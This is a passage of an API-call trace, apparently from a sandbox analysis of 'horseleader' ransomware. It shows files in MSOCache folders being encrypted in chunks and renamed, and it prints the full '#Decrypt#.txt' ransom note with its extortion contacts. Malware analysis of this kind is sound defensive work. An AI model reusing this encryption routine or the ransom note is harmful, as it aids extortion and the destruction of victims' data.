lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0161.535] lstrcmpiW (lpString1="WordLR.cab", lpString2="Windows") returned 1 [0161.535] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0161.535] StrStrIW (lpFirst="WordLR.cab", lpSrch=".horseleader") returned 0x0 [0161.535] lstrcmpW (lpString1="WordLR.cab", lpString2="#Decrypt#.txt") returned 1 [0161.535] lstrcmpW (lpString1="WordLR.cab", lpString2="_uninstalling_.png") returned 1 [0161.535] lstrlenW (lpString=".testttjffg") returned 11 [0161.535] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".testttjffg") returned 0x0 [0161.535] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.535] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.536] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.536] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0161.536] StrStrW (lpFirst="WordLR.cab", lpSrch=".txt") returned 0x0 [0161.536] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=43806141) returned 1 [0161.536] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.536] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.542] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.544] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x14e0ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.545] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.548] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.548] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.548] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x29c1dbd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.548] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.551] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.551] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.551] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.551] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.551] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.552] CloseHandle (hObject=0x21c) returned 1 [0165.764] GetProcessHeap () returned 0x780000 [0165.764] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0165.764] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.horseleader") returned 89 [0165.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.horseleader")) returned 1 [0165.767] GetProcessHeap () returned 0x780000 [0165.767] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0165.767] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0165.767] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Windows") returned 1 [0165.768] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0165.768] StrStrIW (lpFirst="WordMUI.msi", lpSrch=".horseleader") returned 0x0 [0165.768] lstrcmpW (lpString1="WordMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0165.768] lstrcmpW (lpString1="WordMUI.msi", lpString2="_uninstalling_.png") returned 1 [0165.768] lstrlenW (lpString=".testttjffg") returned 11 [0165.768] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", lpSrch=".testttjffg") returned 0x0 [0165.768] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0165.768] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0165.769] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0165.769] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0165.769] StrStrW (lpFirst="WordMUI.msi", lpSrch=".txt") returned 0x0 [0165.769] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2522624) returned 1 [0165.769] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.769] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.826] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.827] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.827] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x131700, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.827] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.996] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0165.996] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0165.997] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x262e00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.997] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0166.020] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.021] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0166.021] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.021] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0166.022] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0166.022] CloseHandle (hObject=0x21c) returned 1 [0168.088] GetProcessHeap () returned 0x780000 [0168.088] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0168.088] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.horseleader") returned 90 [0168.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.horseleader")) returned 1 [0168.099] GetProcessHeap () returned 0x780000 [0168.099] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0168.100] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordMUI.xml", cAlternateFileName="")) returned 1 [0168.100] lstrcmpiW (lpString1="WordMUI.xml", lpString2="Windows") returned 1 [0168.100] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0168.100] StrStrIW (lpFirst="WordMUI.xml", lpSrch=".horseleader") returned 0x0 [0168.100] lstrcmpW (lpString1="WordMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0168.100] lstrcmpW (lpString1="WordMUI.xml", lpString2="_uninstalling_.png") returned 1 [0168.100] lstrlenW (lpString=".testttjffg") returned 11 [0168.100] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml", lpSrch=".testttjffg") returned 0x0 [0168.101] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0168.101] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0168.101] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0168.102] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0168.102] StrStrW (lpFirst="WordMUI.xml", lpSrch=".txt") returned 0x0 [0168.102] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1800) returned 1 [0168.102] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x708, lpOverlapped=0x0) returned 1 [0168.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8f8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.104] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x708, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x708, lpOverlapped=0x0) returned 1 [0168.104] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.104] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0168.105] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0168.105] CloseHandle (hObject=0x21c) returned 1 [0168.109] GetProcessHeap () returned 0x780000 [0168.109] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0168.109] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.horseleader") returned 90 [0168.109] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.horseleader")) returned 1 [0168.110] GetProcessHeap () returned 0x780000 [0168.110] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0168.110] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x708, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordMUI.xml", cAlternateFileName="")) returned 0 [0168.110] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0168.110] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0168.110] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0168.111] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0168.111] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0168.112] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0168.112] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0168.112] CloseHandle (hObject=0x1cc) returned 1 [0168.114] GetProcessHeap () returned 0x780000 [0168.114] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0168.114] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-002C-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92787~1")) returned 1 [0168.114] lstrcmpiW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0168.114] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C") returned 66 [0168.114] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0168.114] lstrcmpW (lpString1="{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0168.114] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0168.114] GetProcessHeap () returned 0x780000 [0168.114] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0168.115] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*") returned 68 [0168.115] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0168.130] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0168.130] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.") returned 68 [0168.131] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0168.131] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0168.131] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") 